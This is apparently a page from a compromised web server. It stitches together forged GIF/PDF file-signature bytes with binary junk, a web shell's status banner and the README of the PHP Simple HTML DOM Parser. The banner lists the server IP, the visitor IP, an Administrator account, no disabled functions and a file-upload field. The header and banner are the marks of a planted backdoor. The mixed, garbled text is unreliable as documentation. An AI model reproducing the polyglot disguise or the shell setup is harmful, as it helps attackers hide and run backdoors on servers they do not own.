GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST1146/Resources/Examples/Week/16/simplehtmldom/manual/docs/ |
Upload File : |
# PHP Simple HTML DOM Parser A fast, simple and reliable HTML document parser for PHP. Created by S.C. Chen, based on [HTML Parser for PHP 4](http://php-html.sourceforge.net/) by Jose Solorzano. # Parse any HTML document PHP Simple HTML DOM Parser handles any HTML document, even ones that are considered invalid by the [HTML](https://www.w3.org/TR/html/) specification. # Select elements using CSS selectors PHP Simple HTML DOM Parser supports CSS style selectors to navigate the DOM, similar to [jQuery](https://jquery.com/). # Download * Download the latest version from [SourceForge](https://sourceforge.net/projects/simplehtmldom/) # Contributing * Request features on the [Feature Request Tracker](https://sourceforge.net/p/simplehtmldom/feature-requests/) * Report bugs on the [Bug Tracker](https://sourceforge.net/p/simplehtmldom/bugs/) * Get involved with the community on the [Discussions Board](https://sourceforge.net/p/simplehtmldom/discussion/) # License PHP Simple HTML DOM Parser is [Free Software](https://en.wikipedia.org/wiki/Free_software) licensed under the [MIT License](https://opensource.org/licenses/MIT).